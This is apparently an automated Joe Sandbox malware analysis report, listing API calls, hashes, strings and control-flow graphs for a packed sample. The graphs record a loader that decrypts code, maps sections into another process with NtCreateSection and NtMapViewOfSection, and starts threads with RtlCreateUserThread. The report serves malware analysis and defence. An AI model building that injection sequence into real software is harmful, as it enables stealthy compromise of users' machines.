                                                                        • Instruction ID: 3999fe2ea24db576f7657d23c26465a461ec30c79b1a0224d1fb40ee8fa08d6d
                                                                        • Opcode Fuzzy Hash: c8559c121642958bdeb8a5be3527d4de0f9ddb177b78d609e1602090be52ff69
                                                                        • Instruction Fuzzy Hash: 85314F79900711AADB10AF75ED0A6173AE0AB8F764B11913BE914936F0D7788841EF5C
                                                                        APIs
                                                                        • __getptd_noexit.LIBCMT ref: 00434056
                                                                          • Part of subcall function 00436AD4: ___set_flsgetvalue.LIBCMT ref: 00436AE6
                                                                          • Part of subcall function 00436AD4: __calloc_crt.LIBCMT ref: 00436AFA
                                                                          • Part of subcall function 00436AD4: __initptd.LIBCMT ref: 00436B23
                                                                        • __calloc_crt.LIBCMT ref: 00434078
                                                                        • __get_sys_err_msg.LIBCMT ref: 00434096
                                                                        • _strcpy_s.LIBCMT ref: 0043409E
                                                                        • __invoke_watson.LIBCMT ref: 004340B3
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2486740120.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_40b000_38E5.jbxd
                                                                        Similarity
                                                                        • API ID: __calloc_crt$___set_flsgetvalue__get_sys_err_msg__getptd_noexit__initptd__invoke_watson_strcpy_s
                                                                        • String ID:
                                                                        • API String ID: 788502912-0
                                                                        • Opcode ID: f6643fcd58231390f0a0cd324d11bc9cc70a1560664bb453f01542fceb6d8df8
                                                                        • Instruction ID: 39280b0692534ef492391a93540d1e778240f8cc2ca39a1588eefa3c8cf7a6f0
                                                                        • Opcode Fuzzy Hash: f6643fcd58231390f0a0cd324d11bc9cc70a1560664bb453f01542fceb6d8df8
                                                                        • Instruction Fuzzy Hash: 4FF0F63270421427D73439665D419EBB2BCCBCC728F11653FF705A3251D52DBC4142AD
                                                                        APIs
                                                                        • __CreateFrameInfo.LIBCMT ref: 00437D3D
                                                                          • Part of subcall function 00433E96: __getptd.LIBCMT ref: 00433EA4
                                                                          • Part of subcall function 00433E96: __getptd.LIBCMT ref: 00433EB2
                                                                        • __getptd.LIBCMT ref: 00437D47
                                                                          • Part of subcall function 00436B4D: __getptd_noexit.LIBCMT ref: 00436B50
                                                                          • Part of subcall function 00436B4D: __amsg_exit.LIBCMT ref: 00436B5D
                                                                        • __getptd.LIBCMT ref: 00437D55
                                                                        • __getptd.LIBCMT ref: 00437D63
                                                                        • __getptd.LIBCMT ref: 00437D6E
                                                                          • Part of subcall function 00433F3B: __CallSettingFrame@12.LIBCMT ref: 00433F87
                                                                          • Part of subcall function 00437E3B: __getptd.LIBCMT ref: 00437E4A
                                                                          • Part of subcall function 00437E3B: __getptd.LIBCMT ref: 00437E58
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2486740120.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_40b000_38E5.jbxd
                                                                        Similarity
                                                                        • API ID: __getptd$CallCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                        • String ID:
                                                                        • API String ID: 3282538202-0
                                                                        • Opcode ID: c9b1cd0b66e810f013b05a769f1013de8cf17294e1aa0560d1f900115752e0ba
                                                                        • Instruction ID: ed279d661dc42825c760b9fc98aca8d678b77b7f2585112291c896c5a2fb70ba
                                                                        • Opcode Fuzzy Hash: c9b1cd0b66e810f013b05a769f1013de8cf17294e1aa0560d1f900115752e0ba
                                                                        • Instruction Fuzzy Hash: 3111D7B1C00209EFDF01EFA5C546BADBBB0FF08319F11906AF914A7251DB389A119F54
                                                                        APIs
                                                                        • __getptd.LIBCMT ref: 00438FB8
                                                                          • Part of subcall function 00436B4D: __getptd_noexit.LIBCMT ref: 00436B50
                                                                          • Part of subcall function 00436B4D: __amsg_exit.LIBCMT ref: 00436B5D
                                                                        • __getptd.LIBCMT ref: 00438FCF
                                                                        • __amsg_exit.LIBCMT ref: 00438FDD
                                                                        • __lock.LIBCMT ref: 00438FED
                                                                        • __updatetlocinfoEx_nolock.LIBCMT ref: 00439001
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2486740120.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_40b000_38E5.jbxd
                                                                        Similarity
                                                                        • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                        • String ID:
                                                                        • API String ID: 938513278-0
                                                                        • Opcode ID: 2dd36e7f9b9cfc2db4ad2576282b04056c78c8fcb387764b801e0ea617750651
                                                                        • Instruction ID: c55a09df3b52eddba3e6a3b5d6970d993694369ddcd95f606bc929f609295e5e
                                                                        • Opcode Fuzzy Hash: 2dd36e7f9b9cfc2db4ad2576282b04056c78c8fcb387764b801e0ea617750651
                                                                        • Instruction Fuzzy Hash: BCF02B32901710EBD7217F769403B0DB3A05F0C729F22620FF614A72D2CF6C2A408A5D
                                                                        APIs
                                                                        Strings
                                                                        • sogudowuwotekonex digimabawer rujusogepisalojar, xrefs: 00430EF1
                                                                        • , xrefs: 00430E62
                                                                        • yoyorohexumutuwasetebayuda, xrefs: 0043102E
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2486740120.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_40b000_38E5.jbxd
                                                                        Similarity
                                                                        • API ID: _memset
                                                                        • String ID: $sogudowuwotekonex digimabawer rujusogepisalojar$yoyorohexumutuwasetebayuda
                                                                        • API String ID: 2102423945-822714830
                                                                        • Opcode ID: 8365fa97ea0e54c40b4bae2d82204bd2bb4824526665fac2de4deb70b3f0016c
                                                                        • Instruction ID: a679fca73d2dda16af80176112bc37e6ab3a80d6958592b53a1f1885a25e40f3
                                                                        • Opcode Fuzzy Hash: 8365fa97ea0e54c40b4bae2d82204bd2bb4824526665fac2de4deb70b3f0016c
                                                                        • Instruction Fuzzy Hash: B5713B75E40208AFEB14DF94DD8AB9DB7B4FB48701F108069E609BB290C7B46A40CF69
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2486740120.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_40b000_38E5.jbxd
                                                                        Similarity
                                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                        • String ID:
                                                                        • API String ID: 3016257755-0
                                                                        • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                        • Instruction ID: cfd293eb2920d9b94e498ee4755f1ba9df46740c805e4260226d03a9992dbe75
                                                                        • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                        • Instruction Fuzzy Hash: 3B116D3640018AFBCF125E84CC81CEE3F22BF1D354F599456FA5968121C73AC9B2AB85
                                                                        APIs
                                                                        • _malloc.LIBCMT ref: 0043392D
                                                                          • Part of subcall function 004340B9: __FF_MSGBANNER.LIBCMT ref: 004340D2
                                                                          • Part of subcall function 004340B9: __NMSG_WRITE.LIBCMT ref: 004340D9
                                                                        • std::exception::exception.LIBCMT ref: 00433962
                                                                        • std::exception::exception.LIBCMT ref: 0043397C
                                                                        • __CxxThrowException@8.LIBCMT ref: 0043398D
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2486740120.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_40b000_38E5.jbxd
                                                                        Similarity
                                                                        • API ID: std::exception::exception$Exception@8Throw_malloc
                                                                        • String ID:
                                                                        • API String ID: 2388904642-0
                                                                        • Opcode ID: 89604e51622c1848ae1726d4459ef3f03cb4279c38a613a2a9ea914e2dd1109e
                                                                        • Instruction ID: 0c3675aeaf0011e457ff1f536f3ee95850dac15337a9e9b26eae673a39aafdee
                                                                        • Opcode Fuzzy Hash: 89604e51622c1848ae1726d4459ef3f03cb4279c38a613a2a9ea914e2dd1109e
                                                                        • Instruction Fuzzy Hash: A8F0267090020AAAEB04EF55DC06B9E37A86F49314F14506FE800A21A1CBB89F408B5C
                                                                        APIs
                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 00431E65
                                                                        • _memmove.LIBCMT ref: 00431EB6
                                                                          • Part of subcall function 00431EF0: std::_Xinvalid_argument.LIBCPMT ref: 00431F0A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2486740120.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_40b000_38E5.jbxd
                                                                        Similarity
                                                                        • API ID: Xinvalid_argumentstd::_$_memmove
                                                                        • String ID: string too long
                                                                        • API String ID: 2168136238-2556327735
                                                                        • Opcode ID: bee2399d89acdff7390fadb7c764c0222abcf93ef081e0b8d32741aa61d96df4
                                                                        • Instruction ID: 9ff1e5a47eb56f93e73d824d9c6d53947e26d97076773c26e80e4cb96c3e41dc
                                                                        • Opcode Fuzzy Hash: bee2399d89acdff7390fadb7c764c0222abcf93ef081e0b8d32741aa61d96df4
                                                                        • Instruction Fuzzy Hash: 1C3109323006104BD7249E5DE98196BF3E9EB9A760F20162FF852C7761C776DC4087A8
                                                                        APIs
                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 00431FF6
                                                                          • Part of subcall function 00432443: std::exception::exception.LIBCMT ref: 00432458
                                                                          • Part of subcall function 00432443: __CxxThrowException@8.LIBCMT ref: 0043246D
                                                                          • Part of subcall function 00432443: std::exception::exception.LIBCMT ref: 0043247E
                                                                        • _memmove.LIBCMT ref: 0043202F
                                                                        Strings
                                                                        • invalid string position, xrefs: 00431FF1
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2486740120.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_40b000_38E5.jbxd
                                                                        Similarity
                                                                        • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                        • String ID: invalid string position
                                                                        • API String ID: 1785806476-1799206989
                                                                        • Opcode ID: 1397517ebf0ae46a801618a01ed36cfdc1a6464828c8918090080f098a212dce
                                                                        • Instruction ID: 6c0ae7a36627a0dfc6bceb10b4348391515713d79e935b59abef4bc461637986
                                                                        • Opcode Fuzzy Hash: 1397517ebf0ae46a801618a01ed36cfdc1a6464828c8918090080f098a212dce
                                                                        • Instruction Fuzzy Hash: F001DB313043108BD3299D5CEE8056AB7BAEB99714F34592FD291C7701D6F5EC46C798
                                                                        APIs
                                                                        • __getptd.LIBCMT ref: 00437E4A
                                                                          • Part of subcall function 00436B4D: __getptd_noexit.LIBCMT ref: 00436B50
                                                                          • Part of subcall function 00436B4D: __amsg_exit.LIBCMT ref: 00436B5D
                                                                        • __getptd.LIBCMT ref: 00437E58
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2486740120.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_40b000_38E5.jbxd
                                                                        Similarity
                                                                        • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                        • String ID: csm
                                                                        • API String ID: 803148776-1018135373
                                                                        • Opcode ID: 5e5b593db96ec5592a6afd293df7648de660035ff22b993f41f96ef09e303681
                                                                        • Instruction ID: 301a8880f988272baa46338c306b3bf3724f51adcf8a0e5165469f776e4bde47
                                                                        • Opcode Fuzzy Hash: 5e5b593db96ec5592a6afd293df7648de660035ff22b993f41f96ef09e303681
                                                                        • Instruction Fuzzy Hash: DF018FB480C2199ACF349F61C44266EB7F6AF18312F24A49FE48096351CB3DAD80CB68

                                                                        Execution Graph

                                                                        Execution Coverage:4.6%
                                                                        Dynamic/Decrypted Code Coverage:78.1%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:64
                                                                        Total number of Limit Nodes:3
                                                                        execution_graph 12222 5d003c 12223 5d0049 12222->12223 12235 5d0e0f SetErrorMode SetErrorMode 12223->12235 12228 5d0265 12229 5d02ce VirtualProtect 12228->12229 12231 5d030b 12229->12231 12230 5d0439 VirtualFree 12234 5d04be LoadLibraryA 12230->12234 12231->12230 12233 5d08c7 12234->12233 12236 5d0223 12235->12236 12237 5d0d90 12236->12237 12238 5d0dad 12237->12238 12239 5d0dbb GetPEB 12238->12239 12240 5d0238 VirtualAlloc 12238->12240 12239->12240 12240->12228 12241 403043 12242 40319a 12241->12242 12243 40306d 12241->12243 12243->12242 12244 403128 RtlCreateUserThread NtTerminateProcess 12243->12244 12244->12242 12245 402f16 12247 402f1a 12245->12247 12246 402fa2 12247->12246 12249 401991 12247->12249 12250 4019a0 12249->12250 12251 4019d8 Sleep 12250->12251 12253 4019f3 12251->12253 12254 4014c4 12251->12254 12253->12246 12255 4014d3 12254->12255 12256 401660 NtDuplicateObject 12255->12256 12265 401571 12255->12265 12257 40167d NtCreateSection 12256->12257 12256->12265 12258 4016a3 NtMapViewOfSection 12257->12258 12259 4016fd NtCreateSection 12257->12259 12258->12259 12260 4016c6 NtMapViewOfSection 12258->12260 12261 401729 12259->12261 12259->12265 12260->12259 12262 4016e4 12260->12262 12263 401733 NtMapViewOfSection 12261->12263 12261->12265 12262->12259 12264 40175a NtMapViewOfSection 12263->12264 12263->12265 12264->12265 12265->12253 12266 6c0016 12267 6c0025 12266->12267 12270 6c07b6 12267->12270 12269 6c002e 12272 6c07d1 12270->12272 12271 6c07da CreateToolhelp32Snapshot 12271->12272 12273 6c07f6 Module32First 12271->12273 12272->12271 12272->12273 12274 6c080b 12273->12274 12275 6c0805 12273->12275 12274->12269 12277 6c0475 12275->12277 12278 6c04a0 12277->12278 12279 6c04e9 12278->12279 12280 6c04b1 VirtualAlloc 12278->12280 12279->12279 12280->12279 12281 4339bc 12283 4339c8 __alloc_osfhnd 12281->12283 12287 435051 HeapCreate 12283->12287 12284 433a35 8 library calls 12288 431540 12284->12288 12286 433ad6 __alloc_osfhnd 12287->12284 12291 431bef __wfopen_s _free __realloc_crt __floor_pentium4 12288->12291 12292 4311b0 12291->12292 12298 4311e0 _strlen 12292->12298 12293 4312d1 LocalAlloc 12294 431301 VirtualProtect 12293->12294 12299 431378 12294->12299 12296 4314f2 LoadLibraryA 12297 43152e 12296->12297 12297->12286 12298->12293 12299->12296

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 69 431540-431be9 70 431c8a-431c96 69->70 71 431bef-431c87 call 432f7d call 43352a call 433376 call 432970 call 433410 call 433150 call 432e60 69->71 72 431c98-431cad 70->72 71->70 78 431cb8-431cbe 72->78 79 431caf-431cb6 72->79 80 431cc0-431cc6 78->80 79->72 79->78 81 431cd4-431cda 80->81 82 431cc8 80->82 84 431ce5-431cf1 call 4311b0 81->84 85 431cdc-431ce3 81->85 82->81 88 431cf6-431d01 84->88 85->80 85->84 90 431d06-431d0c 88->90 92 431d1a-431d1b 90->92 93 431d0e-431d16 90->93 92->90 95 431d1d-431d25 92->95 93->92
                                                                        APIs
                                                                        • _free.LIBCMT ref: 00431C2A
                                                                          • Part of subcall function 0043352A: _malloc.LIBCMT ref: 00433538
                                                                        • __wfopen_s.LIBCMT ref: 00431C44
                                                                          • Part of subcall function 00433150: __indefinite.LIBCMT ref: 004349D0
                                                                        • __floor_pentium4.LIBCMT ref: 00431C80
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2753055164.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_40b000_uievsid.jbxd
                                                                        Similarity
                                                                        • API ID: __floor_pentium4__indefinite__wfopen_s_free_malloc
                                                                        • String ID: F:$&mm$0.txt$=KnH$R`$VD[E$aYX$s6.s$wopeducuzecogexojinuliwutocekay fehotusafobozaheyezesorunizemozo laxuvofududogateducokuxavoxabe ganinebudez
                                                                        • API String ID: 3889868452-3505399015
                                                                        • Opcode ID: d99e9b8741b22aa99d10b1caa619cc7040c5bc56d361daa6ff3a0b13eea6f9e9
                                                                        • Instruction ID: ad96a9d43ed1917ae2a70b0bafe91b8a3833c5c9e6e88e4928b445b74cbf9755
                                                                        • Opcode Fuzzy Hash: d99e9b8741b22aa99d10b1caa619cc7040c5bc56d361daa6ff3a0b13eea6f9e9
                                                                        • Instruction Fuzzy Hash: 0A022DB5609380CFD2708F6AC589B8FF7E4BF85714F10891DE6DA5A620DB3088858F57

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 192 4014c4-4014f6 198 4014f9-40150d call 401240 192->198 203 401512-401513 198->203 204 401544-401545 203->204 205 401515-401528 203->205 206 401547 204->206 207 4015bd-4015d4 204->207 205->198 208 40152a-401535 205->208 209 401596-4015a6 206->209 210 401549-40154b 206->210 208->203 212 401537-401543 208->212 213 4015a8 209->213 210->213 214 40154d-40156d 210->214 212->204 216 4015e7-40160a call 401240 214->216 217 40156f 214->217 226 40160c 216->226 227 40160f-401614 216->227 219 401571 217->219 220 4015e2-4015e3 217->220 220->216 226->227 229 40161a-40162b 227->229 230 40193e-401946 227->230 233 401631-40165a 229->233 234 40193c 229->234 230->227 235 40194b-40198e call 401240 230->235 233->234 243 401660-401677 NtDuplicateObject 233->243 234->235 243->234 245 40167d-4016a1 NtCreateSection 243->245 247 4016a3-4016c4 NtMapViewOfSection 245->247 248 4016fd-401723 NtCreateSection 245->248 247->248 249 4016c6-4016e2 NtMapViewOfSection 247->249 248->234 250 401729-40172d 248->250 249->248 252 4016e4-4016fa 249->252 250->234 253 401733-401754 NtMapViewOfSection 250->253 252->248 253->234 255 40175a-401776 NtMapViewOfSection 253->255 255->234 258 40177c 255->258 258->234 260 40177c call 401781 258->260 260->234
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2752954873.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_400000_uievsid.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2c516529a2ac13b86f5a9833a34ba141477503330a6309f7cab00fb21d89e914
                                                                        • Instruction ID: a2440897234d9063cbd2a71cb92c382042c3cd10596cdc4f18a7c269882a1901
                                                                        • Opcode Fuzzy Hash: 2c516529a2ac13b86f5a9833a34ba141477503330a6309f7cab00fb21d89e914
                                                                        • Instruction Fuzzy Hash: 0981D5B4504244FBDB208F95CC49FEB7BB8EF81740F20416BF902BA1E5D6749902DB66

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 261 4015d5-4015e4 263 4015f4 261->263 264 4015eb-4015f0 261->264 263->264 265 4015f7-40160a call 401240 263->265 264->265 268 40160c 265->268 269 40160f-401614 265->269 268->269 271 40161a-40162b 269->271 272 40193e-401946 269->272 275 401631-40165a 271->275 276 40193c 271->276 272->269 277 40194b-40198e call 401240 272->277 275->276 285 401660-401677 NtDuplicateObject 275->285 276->277 285->276 287 40167d-4016a1 NtCreateSection 285->287 289 4016a3-4016c4 NtMapViewOfSection 287->289 290 4016fd-401723 NtCreateSection 287->290 289->290 291 4016c6-4016e2 NtMapViewOfSection 289->291 290->276 292 401729-40172d 290->292 291->290 294 4016e4-4016fa 291->294 292->276 295 401733-401754 NtMapViewOfSection 292->295 294->290 295->276 297 40175a-401776 NtMapViewOfSection 295->297 297->276 300 40177c 297->300 300->276 302 40177c call 401781 300->302 302->276
                                                                        APIs
                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2752954873.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_400000_uievsid.jbxd
                                                                        Similarity
                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                        • String ID:
                                                                        • API String ID: 1546783058-0
                                                                        • Opcode ID: 7ee060c25f7402fbb52614a213f4e0533528eb01ea0636b15e5313f781570415
                                                                        • Instruction ID: 5b275a0397ac31cab10c66c3112b8ecfdbc4447489e22d1c2cba3eb21d005058
                                                                        • Opcode Fuzzy Hash: 7ee060c25f7402fbb52614a213f4e0533528eb01ea0636b15e5313f781570415
                                                                        • Instruction Fuzzy Hash: 8251F9B5900245BBEB208F91CC48FEF7BB8EF85710F10416AFA11BA2A5D7759941CB64

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 303 4015df-4015e4 305 4015f4 303->305 306 4015eb-4015f0 303->306 305->306 307 4015f7-40160a call 401240 305->307 306->307 310 40160c 307->310 311 40160f-401614 307->311 310->311 313 40161a-40162b 311->313 314 40193e-401946 311->314 317 401631-40165a 313->317 318 40193c 313->318 314->311 319 40194b-40198e call 401240 314->319 317->318 327 401660-401677 NtDuplicateObject 317->327 318->319 327->318 329 40167d-4016a1 NtCreateSection 327->329 331 4016a3-4016c4 NtMapViewOfSection 329->331 332 4016fd-401723 NtCreateSection 329->332 331->332 333 4016c6-4016e2 NtMapViewOfSection 331->333 332->318 334 401729-40172d 332->334 333->332 336 4016e4-4016fa 333->336 334->318 337 401733-401754 NtMapViewOfSection 334->337 336->332 337->318 339 40175a-401776 NtMapViewOfSection 337->339 339->318 342 40177c 339->342 342->318 344 40177c call 401781 342->344 344->318
                                                                        APIs
                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2752954873.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_400000_uievsid.jbxd
                                                                        Similarity
                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                        • String ID:
                                                                        • API String ID: 1546783058-0
                                                                        • Opcode ID: ece60b1a1f6b7668ef9dd9651a4bb7dd92a40417c9a174c89548745d0f41eda4
                                                                        • Instruction ID: aa7ad941c6157971e71dc2736092b98b642c15495c2c07021be349f0f8194e9f
                                                                        • Opcode Fuzzy Hash: ece60b1a1f6b7668ef9dd9651a4bb7dd92a40417c9a174c89548745d0f41eda4
                                                                        • Instruction Fuzzy Hash: 4D51FAB5900249BBEB208F91CC48FEF7BB8EF85710F10015AFA11BA2A5D7749945CB64

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 345 4015f2-4015f4 347 4015f7-40160a call 401240 345->347 348 4015eb-4015f0 345->348 351 40160c 347->351 352 40160f-401614 347->352 348->347 351->352 354 40161a-40162b 352->354 355 40193e-401946 352->355 358 401631-40165a 354->358 359 40193c 354->359 355->352 360 40194b-40198e call 401240 355->360 358->359 368 401660-401677 NtDuplicateObject 358->368 359->360 368->359 370 40167d-4016a1 NtCreateSection 368->370 372 4016a3-4016c4 NtMapViewOfSection 370->372 373 4016fd-401723 NtCreateSection 370->373 372->373 374 4016c6-4016e2 NtMapViewOfSection 372->374 373->359 375 401729-40172d 373->375 374->373 377 4016e4-4016fa 374->377 375->359 378 401733-401754 NtMapViewOfSection 375->378 377->373 378->359 380 40175a-401776 NtMapViewOfSection 378->380 380->359 383 40177c 380->383 383->359 385 40177c call 401781 383->385 385->359
                                                                        APIs
                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2752954873.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_400000_uievsid.jbxd
                                                                        Similarity
                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                        • String ID:
                                                                        • API String ID: 1546783058-0
                                                                        • Opcode ID: 5004b19ac8624500f5096878767cb1f7e044049cfcd571ee7eaf3f6ae6e17c7c
                                                                        • Instruction ID: 51677960ee3875d5e78d4b2c0b9a124aae989836c1cf5ff6a0c78d9f2f0b6c9a
                                                                        • Opcode Fuzzy Hash: 5004b19ac8624500f5096878767cb1f7e044049cfcd571ee7eaf3f6ae6e17c7c
                                                                        • Instruction Fuzzy Hash: 8E51FAB5900249BBEB208F91CC48FAFBBB8EF85710F10415AF911BA2A5D7759941CB64

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 386 4015e6-40160a call 401240 391 40160c 386->391 392 40160f-401614 386->392 391->392 394 40161a-40162b 392->394 395 40193e-401946 392->395 398 401631-40165a 394->398 399 40193c 394->399 395->392 400 40194b-40198e call 401240 395->400 398->399 408 401660-401677 NtDuplicateObject 398->408 399->400 408->399 410 40167d-4016a1 NtCreateSection 408->410 412 4016a3-4016c4 NtMapViewOfSection 410->412 413 4016fd-401723 NtCreateSection 410->413 412->413 414 4016c6-4016e2 NtMapViewOfSection 412->414 413->399 415 401729-40172d 413->415 414->413 417 4016e4-4016fa 414->417 415->399 418 401733-401754 NtMapViewOfSection 415->418 417->413 418->399 420 40175a-401776 NtMapViewOfSection 418->420 420->399 423 40177c 420->423 423->399 425 40177c call 401781 423->425 425->399
                                                                        APIs
                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2752954873.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_400000_uievsid.jbxd
                                                                        Similarity
                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                        • String ID:
                                                                        • API String ID: 1546783058-0
                                                                        • Opcode ID: f3e491e8a03b641489fc3b5b9cce92a4ae92d047acba71485eea125912a2ab07
